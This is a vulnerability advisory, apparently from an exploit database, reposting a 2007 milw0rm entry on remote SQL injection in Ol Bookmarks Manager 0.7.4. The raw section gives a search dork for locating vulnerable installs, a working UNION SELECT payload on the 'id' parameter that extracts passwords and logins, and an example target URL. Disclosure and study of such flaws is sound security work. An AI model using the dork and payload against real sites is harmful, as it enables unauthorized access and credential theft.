Ol Bookmarks Manager 0.7.4 (root) Remote SQL Injection Vulnerabilities

vendor:

Ol Bookmarks Manager

by:

Cyber-Security

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Ol Bookmarks Manager

Affected Version From: 2000.7.4

Affected Version To: 2000.7.4

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Ol Bookmarks Manager 0.7.4 (root) Remote SQL Injection Vulnerabilities

The Ol Bookmarks Manager 0.7.4 (root) is vulnerable to remote SQL injection. An attacker can exploit this vulnerability by injecting malicious SQL queries into the 'id' parameter of the '/read/index.php' script. This allows the attacker to retrieve sensitive information from the database, such as passwords and login credentials.

Mitigation:

The vendor has not provided a patch for this vulnerability. Users are advised to update to a newer version of the Ol Bookmarks Manager or to implement strict input validation to prevent SQL injection attacks.

Source

Exploit-DB raw data:

==========================================================================

Ol Bookmarks Manager 0.7.4 (root) Remote SQL Injection Vulnerabilities

==========================================================================

Found by: Cyber-Security

==========================================================================

D0rk : allintitle:ol'bookmarks

==========================================================================

Download: http://mesh.dl.sourceforge.net/sourceforge/olbookmarks/olbookmarks-0.7.4.tar.gz

==========================================================================

/read/index.php?name=alex&id=-1/**/union/**/select/**/0,1,2,3,4,5,password,login,8,9,10,11,12/**/from/**/preferences/*

Example: http://www.blex.co.uk/bookmarks

==========================================================================
thanx: ThE TiGeR couse he found RFI to this script:)
==========================================================================

# milw0rm.com [2007-05-21]